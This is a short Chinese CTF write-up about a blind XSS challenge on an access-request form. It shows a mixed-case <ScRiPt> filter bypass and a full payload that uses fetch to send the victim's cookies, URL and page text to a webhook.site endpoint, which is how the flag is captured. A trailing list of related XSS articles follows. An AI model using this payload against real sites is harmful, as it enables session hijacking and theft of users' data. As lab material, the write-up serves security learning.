【XSS】这个知识库你需要申请

输入script发现不给用,但可以用大小写进行绕过。

我的申请里也是啥都没有

盲 XSS 在其他的浏览器里执行,我们看不到结果,所以必须让它主动把数据 "寄" 出来。这里用的是webhook.site。

内容就是常用的fetch。

javascript 复制代码
fetch("https://webhook.site/我们的UUID?z="+encodeURIComponent(document.cookie))

?z= 是我们自定义的查询参数。

通过webhook.site可知uuid为bad6a7cc-0d15-412c-a187-47caaddd5e82。

javascript 复制代码
fetch("https://webhook.site/bad6a7cc-0d15-412c-a187-47caaddd5e82?z="+encodeURIComponent(document.cookie))

总的payload就是:

html 复制代码
<ScRiPt>fetch("https://webhook.site/bad6a7cc-0d15-412c-a187-47caaddd5e82?z="+encodeURIComponent(location.href+"||"+document.cookie+"||"+document.body.innerText))</ScRiPt>

提交访问申请等待一会能从回显里看到flag

相关推荐
zander2583 天前
知识分享平台项目复习第二天:登录模块中的双令牌与刷新安全(2)
xss·csrf·cors·登录模块·cookie的三个属性
样子20186 天前
Js 之根据白名单过滤 HTML(防止 XSS 攻击)
android·前端·javascript·html·xss
DsirNg7 天前
登录后的那一个小时:把前端会话续期做成可收敛的控制面
xss·csrf·token·cookie·refresh token·前端安全·登录态
小江的记录本17 天前
【CSS】CSS 核心:盒模型、BFC/IFC、Flex/Grid 布局、响应式布局、移动端适配(附《思维导图》)
前端·css·面试·前端框架·tensorflow·html5·xss
DsirNg18 天前
凭证不是登录态:从攻击面重做浏览器认证设计
oauth·xss·csrf·token·cookie·认证授权·web 安全
蒲公英eric20 天前
从客户端到服务端:DVWA DOM 型 XSS 模块完整漏洞分析教程
前端·web安全·ai·xss·dvwa·ai安全
Blockchina20 天前
Codex安全盲区:我用4组本地测试复盘SQLi、XSS、越权与路径穿越
sql·安全·xss
黄俊懿21 天前
【架构师从入门到进阶】第五章:DNS&CDN&网关优化思路——第七节:网关-XSS攻击与预防
网关·网络安全·架构·系统架构·架构师·xss·架构设计
HackTwoHub21 天前
Butter_Cookie 黄油曲奇|浏览器渗透插件,云存储检测、XSS、SQL 注入一站式 Web 安全测试工具
前端·sql·安全·web安全·网络安全·自动化·xss